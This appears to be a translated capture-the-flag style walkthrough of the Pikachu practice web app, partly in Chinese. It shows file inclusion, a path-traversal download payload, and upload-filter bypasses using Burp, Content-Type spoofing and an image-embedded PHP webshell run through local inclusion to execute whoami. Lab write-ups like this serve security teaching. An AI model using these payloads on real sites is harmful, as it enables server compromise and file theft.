pikachu file contains, upload, download

First, the file contains

1.File Inclusion(local)

Our first test, select and then submit kobe

Find url changes occur

 

 

 

 

Found that can read files in the root directory of the flag, there is a local file that contains the vulnerability.

2.File Inclusion(remote)

Ibid., Kobe choose to submit, find also changed url

So this structure to include the url, I chose to park my blog address https://www.cnblogs.com/p201721440034

Returned the following results

 

So Remote File Inclusion success.

Second, file download

Open the site you can find tips click on the link to download the picture.

 

 

 Just copy a download link found

http://172.16.124.129/pikachu/vul/unsafedownload/execdownload.php?filename=lmx.png

Not based on Download, but through mass participation download pictures.

So as usual payload structure 

http://172.16.124.129/pikachu/vul/unsafedownload/execdownload.php?filename=../../../../../../../../flag

Visit this link, found flag to start the download file, any file download vulnerability generated.

 

 Second, file upload

  1.client check

Therefore, we must first determine the front-end or back-end validation verification, use the review to determine the elements.

Js distal check code obtained

    function checkFileExt(filename)
    {
        var flag = false; //状态
        var arr = ["jpg","png","gif"]; //取出上传文件的扩展名 var index = filename.lastIndexOf("."); var ext = filename.substr(index+1); //比较 for(var i=0;i<arr.length;i++) { if(ext == arr[i]) { flag = true; //一旦找到合适的，立即退出循环 break; } } //条件判断 if(!flag) { alert("上传的文件不符合要求，请重新选择！"); location.reload(true); } }

所以此文件上传过滤可以利用burp来修改，我们先选择gif后缀的php一句话木马文件

 点击上传，利用burp拦截数据包

 

 修改filename为111.php点击forward

 上传成功，路径为uploads/111.php

所以我们构造payload直接执行命令

http://172.16.124.129/pikachu/vul/unsafeupload/uploads/111.php?a=whoamil

2.MIME type

同上，但是这次通过查看审查元素，没有发现有前端验证，然后根据测试发现只能传图片文件，但没有检测文件名。

 点击上传。

//只通过判断Content-Type: 字段来确定文件类型
//修改filename即可
Content-Disposition: form-data; name="uploadfile"; filename="S4tan.php" Content-Type: image/jpeg

发现PHP文件上传成功

 上传路径为

http://172.16.124.129/pikachu/vul/unsafeupload/uploads/a123.php

同上，payload为

http://172.16.124.129/pikachu/vul/unsafeupload/uploads/a123.php?a=whoami

3.getimagesize

同上，经过判定无前端验证，提交一句话测试。

 发现服务器判定文件为假图片，根据此漏洞名可以判定为，此上传过滤依靠文件大小进行判定，将一句话木马拼接在图片后面。

 生成了一个图片马，但是服务器端将你上传的文件进行重命名了，所以要想此文件被解析成php文件，我们只能利用文件包含漏洞去包含图片马。

利用之前文件包含漏洞的payload去包含此图片马，构造payload

http://172.16.124.129/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2019/12/19/8653725dfb71073ffa8429484095.jpg&submit=%E6%8F%90%E4%BA%A4\

执行whoami

发现执行成功。